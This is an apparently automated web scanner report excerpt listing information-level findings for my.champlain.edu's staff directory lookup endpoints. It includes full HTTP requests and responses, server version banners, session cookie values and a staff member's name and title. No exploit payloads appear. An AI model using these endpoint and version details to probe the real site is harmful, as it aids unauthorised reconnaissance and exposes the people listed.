HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:45:42 GMT Content-Length: 8025 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.dash ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /xhr/dird |
POST /xhr/dird HTTP/1.1 Host: my.champlain.edu Connection: keep-alive Content-Length: 50 Origin: https://my.champlain.edu X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde name=Pellitier&department |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:49:54 GMT Content-Length: 1314 <br /><b>Results (4)</b>:<br /><div align="center" style="padding-bottom:5px Wheeler, Linda<br />Director, Events Center< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /xhr/dirp |
POST /xhr/dirp HTTP/1.1 Host: my.champlain.edu Connection: keep-alive Content-Length: 36 Origin: https://my.champlain.edu X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde name=pellitier&department |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:49:48 GMT Content-Length: 39 <br /><br /><b>Invalid input.<b></br /> |
Severity: | Information |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /xhr/dird |
GET /xhr/dird HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=gkilk8211c X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:39 GMT Connection: close Content-Length: 39 <br /><br /><b>Invalid input.<b></br /> |
Severity: | Information |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /xhr/dirp |
POST /xhr/dirp HTTP/1.1 Host: my.champlain.edu Connection: keep-alive Content-Length: 36 Origin: https://my.champlain.edu X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde name=pellitier&department |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:49:48 GMT Content-Length: 39 <br /><br /><b>Invalid input.<b></br /> |